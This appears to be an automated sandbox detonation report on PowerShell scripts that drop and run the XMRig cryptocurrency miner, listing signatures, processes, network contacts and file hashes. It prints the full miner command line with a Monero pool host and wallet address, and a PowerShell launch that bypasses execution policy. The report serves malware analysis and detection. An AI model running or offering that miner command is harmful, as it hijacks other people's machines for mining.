| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4496 wrote to memory of 1824 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4496 wrote to memory of 1824 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 159.113.53.23.in-addr.arpa | udp |
Files
memory/4496-3-0x00007FFBCC3E3000-0x00007FFBCC3E4000-memory.dmp
memory/4496-6-0x0000011EC5C10000-0x0000011EC5C32000-memory.dmp
memory/4496-5-0x00007FFBCC3E0000-0x00007FFBCCDCC000-memory.dmp
memory/4496-10-0x00007FFBCC3E0000-0x00007FFBCCDCC000-memory.dmp
memory/4496-9-0x0000011EC5ED0000-0x0000011EC5F46000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ybtlsrzt.cnc.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4496-26-0x00007FFBCC3E0000-0x00007FFBCCDCC000-memory.dmp
memory/4496-49-0x0000011EC5F50000-0x0000011EC5F62000-memory.dmp
memory/4496-62-0x0000011EC5CA0000-0x0000011EC5CAA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1824-91-0x000002BE8F030000-0x000002BE8F050000-memory.dmp
memory/1824-92-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-93-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/4496-94-0x00007FFBCC3E0000-0x00007FFBCCDCC000-memory.dmp
memory/4496-95-0x00007FFBCC3E3000-0x00007FFBCC3E4000-memory.dmp
memory/4496-96-0x00007FFBCC3E0000-0x00007FFBCCDCC000-memory.dmp
memory/1824-97-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-98-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-99-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-100-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-101-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-102-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-103-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-104-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-105-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-106-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-107-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-108-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-109-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-110-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-111-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-112-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-113-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-114-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-115-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-116-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-117-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-118-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-119-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-120-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-121-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-122-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-123-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-124-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-125-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-126-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-127-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-128-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-129-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-130-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-131-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-132-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-133-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-134-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-135-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-136-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-137-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-138-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-139-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-140-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-141-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-142-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-143-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-144-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-145-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-146-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-147-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-148-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-149-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-150-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-151-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-152-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-153-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-154-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-155-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-156-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-157-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:23
Platform
win10v2004-20240426-en
Max time kernel
1797s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1496 wrote to memory of 1680 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1496 wrote to memory of 1680 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.162.46.104.in-addr.arpa | udp |
Files
memory/1496-0-0x00007FFB22803000-0x00007FFB22805000-memory.dmp
memory/1496-1-0x0000019233510000-0x0000019233532000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sytnh33q.akj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1496-11-0x00007FFB22800000-0x00007FFB232C1000-memory.dmp
memory/1496-12-0x00007FFB22800000-0x00007FFB232C1000-memory.dmp
memory/1496-14-0x00007FFB22800000-0x00007FFB232C1000-memory.dmp
memory/1496-15-0x000001924C760000-0x000001924C772000-memory.dmp
memory/1496-16-0x000001924C400000-0x000001924C40A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1680-47-0x000001F1DE8E0000-0x000001F1DE900000-memory.dmp
memory/1680-48-0x000001F1DE920000-0x000001F1DE940000-memory.dmp
memory/1680-49-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-51-0x000001F1DE960000-0x000001F1DE980000-memory.dmp
memory/1680-50-0x000001F1DE940000-0x000001F1DE960000-memory.dmp
memory/1680-52-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1496-53-0x00007FFB22803000-0x00007FFB22805000-memory.dmp
memory/1496-54-0x00007FFB22800000-0x00007FFB232C1000-memory.dmp
memory/1496-56-0x00007FFB22800000-0x00007FFB232C1000-memory.dmp
memory/1680-55-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-59-0x000001F1DE960000-0x000001F1DE980000-memory.dmp
memory/1680-58-0x000001F1DE940000-0x000001F1DE960000-memory.dmp
memory/1680-57-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-60-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-61-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-62-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-63-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-64-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-65-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-66-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-67-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-68-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-69-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-70-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-71-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-72-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-73-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-74-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-75-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-76-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-77-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-78-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-79-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-80-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-81-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-82-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-83-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-84-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-85-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-86-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-87-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-88-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-89-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-90-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-91-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-92-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-93-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-94-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-95-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-96-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-97-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-98-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-99-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-100-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-101-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-102-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-103-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-104-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-105-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-106-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-107-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-108-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-109-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-110-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-111-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-112-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-113-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-114-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-115-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-116-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-117-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-118-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:35
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4988 wrote to memory of 1576 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4988 wrote to memory of 1576 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
